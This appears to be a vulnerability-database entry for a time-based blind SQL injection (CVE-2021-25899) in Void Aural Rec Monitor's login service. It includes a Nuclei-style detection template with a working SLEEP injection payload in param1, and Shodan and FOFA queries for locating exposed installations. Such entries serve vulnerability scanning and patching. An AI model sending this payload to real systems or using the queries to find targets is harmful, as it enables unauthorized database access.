CVE-2021-25899: Void Aural Rec Monitor 9.0.0.1 - SQL Injection

日期: 2025-08-01 | 影响软件: Void Aural Rec Monitor | POC: 已公开

漏洞描述

Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: CVE-2021-25899

info:
  name: Void Aural Rec Monitor 9.0.0.1 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    Void Aural Rec Monitor 9.0.0.1 contains a SQL injection vulnerability in svc-login.php. An attacker can send a crafted HTTP request to perform a blind time-based SQL injection via the param1 parameter and thus possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Void Aural Rec Monitor 9.0.0.1.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/all-your-databases-belong-to-me-a-blind-sqli-case-study/
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28765
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25899
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-25899
    cwe-id: CWE-89
    epss-score: 0.85351
    epss-percentile: 0.99321
    cpe: cpe:2.3:a:void:aurall_rec_monitor:9.0.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: void
    product: aurall_rec_monitor
    shodan-query:
      - html:"AURALL"
      - http.html:"aurall"
    fofa-query: body="aurall"
  tags: time-based-sqli,cve2021,cve,sqli,void,aurall

http:
  - raw:
      - |
        @timeout: 15s
        POST /AurallRECMonitor/services/svc-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))dummy)--+dummy&param2=test

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Contacte con el administrador")'
        condition: and
# digest: 4a0a0047304502201f42dd14c1f906b26e81c9873e1c07a222b262fdcac90ec464ba0bbe4028be57022100a2eb2831f172c6b6f6a7b42a96dd8fa0c64c72d85b082f83d8b9f6a2e8fe765e:922c64590222798bb761d5b6d8e72950